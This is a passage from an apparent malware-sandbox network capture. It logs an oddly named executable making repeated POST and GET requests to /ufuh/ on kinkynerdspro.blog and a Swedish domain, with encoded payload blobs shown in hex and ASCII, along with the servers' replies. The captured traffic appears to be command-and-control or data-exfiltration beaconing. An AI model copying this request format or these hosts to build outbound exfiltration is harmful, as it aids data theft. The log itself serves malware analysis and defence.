39 39 38 2b 56 70 63 78 63 6e 4d 4f 71 52 62 32 31 41 31 41 69 7a 5a 69 4f 53 43 35 30 52 44 54 57 41 67 6d 44 6b 46 49 39 76 58 4c 39 50 56 2f 41 79 4d 64 57 63 30 75 42 64 2f 4a 50 70 32 47 56 75 6b 62 43 6b 32 68 6f 67 75 6d 33 70 51 42 4c 62 4d 66 43 46 62 6b 77 4c 4f 36 69 4b 6f 46 4a 53 70 65 64 37 4a 72 73 58 67 4c 6c 61 57 4d 6d 47 66 53 4e 2b 4c 36 7a 63 78 37 58 33 39 35 55 6b 46 53 2b 69 41 4f 6d 44 58 62 33 6b 66 30 62 56 71 32 51 49 59 6e 57 4b 76 74 57 48 45 48 76 51 39 73 43 52 77 78 66 68 6a 4b 4d 6c 7a 6f 48 5a 47 75 66 78 39 50 58 52 36 78 71 44 39 56 6f 72 51 43 4d 35 52 78 31 71 4d 73 73 4f 61 51 6e 43 6b 67 63 4b 70 43 6f 73 69 69 54 69 44 69 33 76 5a 43 4f 70 39 [TRUNCATED] Data Ascii: ZXdp=S8onh96WtuR/E2qb2eLSGtZGxWnKI3xhHwA2KNEgeg4YITCVWEyzuL9Guw7iTnwVr/xYklmTobgnKYpQWaWg9vWcOQhW8ZgUsORrXi998+VpcxcnMOqRb21A1AizZiOSC50RDTWAgmDkFI9vXL9PV/AyMdWc0uBd/JPp2GVukbCk2hogum3pQBLbMfCFbkwLO6iKoFJSped7JrsXgLlaWMmGfSN+L6zcx7X395UkFS+iAOmDXb3kf0bVq2QIYnWKvtWHEHvQ9sCRwxfhjKMlzoHZGufx9PXR6xqD9VorQCM5Rx1qMssOaQnCkgcKpCosiiTiDi3vZCOp9A0mfyqWuXqeMyuOHd9aFLQYFq0ZfNiPhZDVabL9o1k6Sy4RShe0aOqWYNsXIAxVsVJ5jQidcIww9K0uYI6nbr/QRXFRS31On9a59ERp4xDBfnW5gLHSkkVz8k6UFeBhpo/6tHzlv8bHTaZ6kkXFcRnzyjcYQS2Cq1EUBPx7VFgqjnmVNt7PvOgxauqQE/soFQFT0MZmiqZJcj099bXK+sLyEvRARbHnaaiUfbcSQiIaP1mX/HBcdnCGC9T3oeJaEs/jcmMtoSf9EzzB2SB7WDglbG3h6CLw5LuCZSjW4reiuLGCWBtoS3AnjH6AwrfOWU/KUa7Zmj2cq8W1kNxYzfY2iQPpeM1nrID4kpI1308/+PsBOdXzMxpELOmttmxNfjMKcCzjjdrDadQLX38yoIEtGjflKN9tEzATE77AEHs7qP6ae9iiB3pcfwCR61tQmgQopch+VrVNvIn9PYmqhEfnXu/sFRW1/+77qiJee3kzUDAPhKbgvHdQ/Rhhddt+uNnsu9oUnjXkPup5K360RZSaZB8NDf6nt6/ZbWeY7W9VfgJwZgBjqAcghjg1eVl3Lq6pKt01tAqz9qmJsFU0dn6bA/F1IccVFUvMrFH/JX/rhMzkHCFbfyFpS0t7jqoWNPf90AsRDau0G8eF2y09/0DEUTmO7LFsMHh [TRUNCATED]
Jun 3, 2024 08:52:42.703699112 CEST	229	OUT	Data Raw: 2b 4f 64 30 55 36 34 58 31 67 43 34 39 31 6d 4d 7a 7a 52 2b 56 62 68 45 6c 36 4f 43 6a 6c 56 6e 33 58 79 4d 2b 56 73 57 77 78 78 48 72 41 46 75 6c 6a 4c 45 4d 4c 51 51 4a 51 33 55 6b 34 58 4e 59 55 33 57 52 39 66 50 35 6f 66 43 49 48 79 45 4c 47 Data Ascii: +Od0U64X1gC491mMzzR+VbhEl6OCjlVn3XyM+VsWwxxHrAFuljLEMLQQJQ3Uk4XNYU3WR9fP5ofCIHyELGliUI4h2W1u13hDoVnK2QkMZE51eH3sBG1U9mmCrfVH8X1C/s8gj+QsGwgZEl3fb8m0N/juqTWahQZbXBndq8ieyjyDsLwIvHzSjo4GEWaNnuAMYT5u/+8D2+iFDsJjxbQPzacdjoBe2/GB+GLqf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49165	54.38.220.85	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:52:45.215352058 CEST	740	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 201 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.kinkynerdspro.blog Origin: http://www.kinkynerdspro.blog Referer: http://www.kinkynerdspro.blog/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 45 31 53 62 33 4b 66 53 41 39 5a 47 6c 32 6e 4b 47 58 78 6e 48 33 49 2b 4b 49 39 39 65 52 77 59 49 6d 2b 56 57 32 61 7a 2b 62 39 46 6b 51 37 63 65 48 78 66 72 2f 77 4a 6b 6e 79 54 6f 62 30 6e 46 62 42 51 48 4c 57 6a 69 76 57 65 46 77 68 62 38 5a 73 6e 73 4f 74 37 58 6a 46 39 38 39 42 70 66 31 41 6e 4a 74 43 52 4c 32 31 5a 2b 67 69 6b 5a 69 79 39 43 35 6b 6a 44 53 61 41 67 58 50 6b 46 64 78 76 51 63 4a 50 63 66 41 7a 57 74 58 6f 31 74 6b 6d 36 70 58 31 71 31 30 4c 6c 4b 57 68 39 7a 45 32 73 77 50 59 47 6a 6a 4c 56 4c 57 4c 64 57 31 6e 59 41 3d 3d Data Ascii: ZXdp=S8onh96WtuR/E1Sb3KfSA9ZGl2nKGXxnH3I+KI99eRwYIm+VW2az+b9FkQ7ceHxfr/wJknyTob0nFbBQHLWjivWeFwhb8ZsnsOt7XjF989Bpf1AnJtCRL21Z+gikZiy9C5kjDSaAgXPkFdxvQcJPcfAzWtXo1tkm6pX1q10LlKWh9zE2swPYGjjLVLWLdW1nYA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49166	54.38.220.85	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:52:47.743140936 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 3625 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.kinkynerdspro.blog Origin: http://www.kinkynerdspro.blog Referer: http://www.kinkynerdspro.blog/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 46 57 61 62 79 72 66 53 58 74 5a 48 38 32 6e 4b 49 33 78 6a 48 77 41 2b 4b 4e 45 67 65 6c 55 59 49 56 57 56 52 55 79 7a 74 4c 39 46 69 51 37 69 54 6e 77 55 72 2f 55 46 6b 6c 61 70 6f 59 59 6e 4b 63 46 51 57 64 4b 67 74 2f 57 63 42 77 68 55 38 5a 73 79 73 4f 64 33 58 6a 42 45 38 39 5a 70 66 6e 59 6e 50 64 43 4f 56 6d 31 5a 2b 67 69 6f 5a 69 7a 75 43 35 38 37 44 57 58 48 67 68 4c 6b 47 34 39 76 41 4c 39 4d 58 2f 42 34 49 64 57 6f 30 75 39 73 2f 4a 50 58 32 47 77 46 6b 62 4f 6b 33 30 38 67 75 68 72 71 4d 68 4c 55 53 66 43 46 56 45 77 4a 4f 36 6a 56 6f 46 4a 53 70 65 4a 37 47 62 73 58 67 4b 6c 64 56 38 6d 47 44 43 4e 6e 50 36 75 6c 78 37 53 55 39 34 6c 54 47 68 53 69 42 4d 4f 44 47 62 33 6b 4f 30 61 65 71 32 51 2f 44 33 57 67 76 70 37 34 45 48 66 36 39 73 43 52 77 33 4c 68 31 2f 34 6c 36 59 48 5a 4f 4f 66 79 76 50 58 53 36 78 75 78 39 56 4d 72 51 47 59 35 51 42 46 71 64 4f 30 42 56 41 6e 42 67 67 63 49 74 43 70 32 69 6a 2f 45 44 69 2f 4a 5a 42 47 70 39 [TRUNCATED] Data Ascii: ZXdp=S8onh96WtuR/FWabyrfSXtZH82nKI3xjHwA+KNEgelUYIVWVRUyztL9FiQ7iTnwUr/UFklapoYYnKcFQWdKgt/WcBwhU8ZsysOd3XjBE89ZpfnYnPdCOVm1Z+gioZizuC587DWXHghLkG49vAL9MX/B4IdWo0u9s/JPX2GwFkbOk308guhrqMhLUSfCFVEwJO6jVoFJSpeJ7GbsXgKldV8mGDCNnP6ulx7SU94lTGhSiBMODGb3kO0aeq2Q/D3Wgvp74EHf69sCRw3Lh1/4l6YHZOOfyvPXS6xux9VMrQGY5QBFqdO0BVAnBggcItCp2ij/EDi/JZBGp9CcmdTqWuHqZYiuKN4leFLIHFqxkfOmPgLrVOIz601lQVy4bERfLaNGoYMgXJx5VtR95oH+eUYw35K0DD46zbrrYRX5BSCJOnNa58iNukxCJSHWv67GVkkVN8mjhFMRhprX6uVrlv8bEWaZgqEb3cRr/yg4IQUSCrmcUBMp7OVgq5XmSU977vOFKauztEPIoAGhT2OxmrqZPRD08y7XX+sbyErQLRbvnUfaUe4ESfCIeDVmE/HB6dnOCC9DNocdaEt/jUHMtlyf4GzzFySANWDp4bGKM6Gfw5veCfjjWiLeggbGCYhtwSztajF/3wp/OXlvKca7e5D2bo8W219wBzfI2iQTpePln3pD4yII1+k89wvsHbtbTMxY9LLK9tgBNf3gKVgrkvNqpMtQRdX8OoIEpGh/TK4JtEHUTI/PDGns89f6NQdjdB356fyeB7CdQmggopPJ+VbVNvIn+PYmuhEDZXvPGFRW1/v77qQReVXk6WDAflKbEvHRi/QJPdZd+h5zsu9oXqzXnV+p+K3GtRZS4ZBgNDN2nsvjZawiY829VPAJxMwBuqAd9hmRyeXd3KbapJrIqhQqw/qmf+FYRdnm5A+N1IvIVEEDMq1H/DX/o48zxIiZHfyJDS19rjfMWL8n92BsQPKu1bMeb2y4e/07MUTfs7MRsMnh [TRUNCATED]
Jun 3, 2024 08:52:47.748110056 CEST	1693	OUT	Data Raw: 2b 4f 64 45 55 36 37 76 31 68 79 34 36 71 47 4d 32 70 68 2b 53 53 42 46 2b 36 4f 44 53 6c 55 4c 64 58 31 4d 2b 56 2b 65 77 33 41 48 72 42 31 75 76 77 72 45 66 61 41 63 68 51 33 59 67 34 57 39 75 56 47 32 52 38 74 33 35 6a 4e 61 49 4b 79 45 77 64 Data Ascii: +OdEU67v1hy46qGM2ph+SSBF+6ODSlULdX1M+V+ew3AHrB1uvwrEfaAchQ3Yg4W9uVG2R8t35jNaIKyEwdliZI4tKW1eP3lfWVTa2RUMZTLddD3tIB1UwmmDMfVe1X0+vs94j+SEGwQZLoXfZ7m1M/jiDTWSLQZLXBlZq/G6ygyDsEQIuOTSAnYCLWaolpBQ9dO2k7/rNnQJFsb/BRRGaS+1aqneugHdsL/+X6roOHZfQBQOfvg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49167	54.38.220.85	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:52:50.269937992 CEST	467	OUT	GET /ufuh/?ZXdp=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.kinkynerdspro.blog User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:52:51.103182077 CEST	739	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 03 Jun 2024 06:52:50 GMT Content-Type: text/html Content-Length: 580 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49168	194.9.94.86	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:52:56.322264910 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 2161 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 45 41 4e 63 46 47 39 32 58 46 4e 61 36 68 55 31 66 55 47 32 30 7a 71 78 71 52 4b 78 76 49 64 53 63 66 73 76 68 48 54 49 4f 46 66 77 69 77 67 37 47 6e 4f 59 62 7a 42 6a 50 62 74 73 5a 62 48 61 58 4b 35 4d 76 74 69 6d 67 4f 65 64 43 70 68 79 7a 42 54 5a 6a 5a 68 64 57 63 62 70 6a 64 59 7a 44 56 63 6f 68 72 77 35 6d 5a 37 59 49 58 67 69 67 4b 4c 2b 55 50 6f 37 47 46 37 7a 67 75 52 36 62 44 64 73 59 64 71 65 79 54 38 45 66 6f 73 61 54 68 6a 65 4c 45 38 31 78 46 78 59 4e 79 78 7a 63 79 68 69 7a 5a 77 31 4a 6c 6b 6a 53 32 78 70 49 6e 76 47 68 48 2f 37 55 57 42 2f 63 33 6b 74 39 7a 67 38 2f 6e 71 73 42 75 56 78 63 66 41 35 58 6d 55 6c 71 31 45 61 56 4d 69 6a 47 2b 54 38 55 43 6f 39 71 4a 5a 64 51 30 5a 57 72 71 6f 41 34 73 2f 31 32 4f 59 62 63 73 6d 48 70 4d 4f 4e 5a 37 54 72 5a 52 67 57 65 45 69 37 71 6a 79 48 77 61 43 2b 6e 7a 70 51 47 57 77 6d 6d 51 67 4b 64 4c 6e 45 4e 4e 6b 32 57 44 70 62 35 67 63 59 6c 4a 76 50 75 38 66 36 44 41 31 59 38 36 7a 31 61 37 68 72 57 4b 65 61 71 4b 52 42 2f [TRUNCATED] Data Ascii: ZXdp=EANcFG92XFNa6hU1fUG20zqxqRKxvIdScfsvhHTIOFfwiwg7GnOYbzBjPbtsZbHaXK5MvtimgOedCphyzBTZjZhdWcbpjdYzDVcohrw5mZ7YIXgigKL+UPo7GF7zguR6bDdsYdqeyT8EfosaThjeLE81xFxYNyxzcyhizZw1JlkjS2xpInvGhH/7UWB/c3kt9zg8/nqsBuVxcfA5XmUlq1EaVMijG+T8UCo9qJZdQ0ZWrqoA4s/12OYbcsmHpMONZ7TrZRgWeEi7qjyHwaC+nzpQGWwmmQgKdLnENNk2WDpb5gcYlJvPu8f6DA1Y86z1a7hrWKeaqKRB/ggH1ngkjbmnacjHcRIdhoMMJ9UcsuxAkv+1nlgkVq/iIxTlrj7CSiqxS/Tx1Y2guXjKMaun/W6pMiK9Kh5M6vQ3UDSvifYcVffwjKSM5ViWcnzSdhdipgYGyHG0e1TmQnoRqSDmBMiu/AWbPBAUgN4U5jirDKxvvKp9AJabH8khUGfENgciKOOrn0XgjqGuYv6MHbTrGahZkApWLnj/ZP3cYqGWzPhd3a0ZdBgLWq+JqEdiDzF8MiQ7h/WUGEDuL1gbin2R4lZIowjzjLZZ0x7ZpHL3eTF2eA2fH0MDJ8VrzWRsFT1yWRiMPBl6LS3apgWnsMCMQy9FraggbGR22n/CpjX973vD+rP7hIZ9TlCBD65reY8V+PQ3unF5T7qgxDZXCsGrAyrEyiS3ddcEIbSIGsc5OZwRCG4OlMsJQeGF6C6P1MJrO9ki+bsePp1mLBAi5NErumAtiGO9LLltjhsfBkrwCUgRWr0hdf+3hBNQVKjRmNoPPcHClfzZt1XLtQGGubui4sATmXJSoSCn7G5sRRLnALr4PQ51av2S0+OwLzlIfVckj+xIIgTYzcSBYaKP+RBfp5LMeN9kJT89CH7/lnZN1srKOisczcmPebg8P9e8etgq6gjPlQuCkJBK16uT9ZaCGdZ68umA/dNVi3YxpG9qdhh0Twp [TRUNCATED]
Jun 3, 2024 08:52:56.327203989 CEST	235	OUT	Data Raw: 36 44 4b 79 37 68 7a 4c 46 58 32 32 6b 47 6a 2b 55 36 50 34 54 73 57 4e 50 49 41 62 75 62 73 53 48 53 63 65 71 53 57 52 4d 77 76 55 2b 4e 75 59 2b 44 56 6a 2f 51 57 54 64 64 37 56 42 73 67 36 6b 30 78 2b 7a 74 65 78 69 31 66 4d 71 55 46 53 43 47 Data Ascii: 6DKy7hzLFX22kGj+U6P4TsWNPIAbubsSHSceqSWRMwvU+NuY+DVj/QWTdd7VBsg6k0x+ztexi1fMqUFSCG3aYo97em5Rc5bml1gHB07CQo+MHM6Xbkboah3cdkYXqrtXdXGb/vHuW7wpCPGsGWIsc0dIitiuP7bpeXQUqDxsKjPtO6PAoWRUIBkQNb4JBVEDY5fEQ26StEYEURAmR4OcYKx4E1KcPf1HxzBwK9Cea31
Jun 3, 2024 08:52:57.153166056 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 03 Jun 2024 06:52:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.24 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jun 3, 2024 08:52:57.153187990 CEST	212	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
Jun 3, 2024 08:52:57.153198957 CEST	1236	IN	Data Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
Jun 3, 2024 08:52:57.153212070 CEST	1236	IN	Data Raw: 20 73 74 61 72 74 65 64 3f 20 4c 6f 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
Jun 3, 2024 08:52:57.153224945 CEST	1236	IN	Data Raw: 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
Jun 3, 2024 08:52:57.153306961 CEST	666	IN	Data Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49169	194.9.94.86	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:52:58.849838018 CEST	746	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 201 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 45 41 4e 63 46 47 39 32 58 46 4e 61 36 69 73 31 51 6c 47 32 31 54 71 78 36 42 4b 78 6d 6f 64 55 63 66 67 6e 68 44 72 59 4f 32 50 77 69 42 51 37 47 56 57 59 63 7a 42 6b 41 37 74 77 58 37 47 65 58 4b 34 6e 76 73 4f 6d 67 4f 61 64 43 4c 4a 79 31 44 37 47 37 35 68 66 51 63 62 73 6a 64 63 59 44 56 51 65 68 71 59 35 6d 66 62 59 4c 55 59 69 78 59 6a 2b 65 66 6f 48 41 46 37 6b 67 75 4e 56 62 44 4e 30 59 65 75 65 79 6d 41 45 66 5a 4d 61 52 47 33 65 45 6b 38 30 72 31 77 4a 4d 58 55 65 62 79 4a 75 36 36 67 67 47 6d 4a 4f 51 56 5a 71 4f 6e 54 4f 6a 46 36 57 55 44 77 76 61 55 4a 7a 6e 51 3d 3d Data Ascii: ZXdp=EANcFG92XFNa6is1QlG21Tqx6BKxmodUcfgnhDrYO2PwiBQ7GVWYczBkA7twX7GeXK4nvsOmgOadCLJy1D7G75hfQcbsjdcYDVQehqY5mfbYLUYixYj+efoHAF7kguNVbDN0YeueymAEfZMaRG3eEk80r1wJMXUebyJu66ggGmJOQVZqOnTOjF6WUDwvaUJznQ==
Jun 3, 2024 08:52:59.682888985 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 03 Jun 2024 06:52:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.24 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 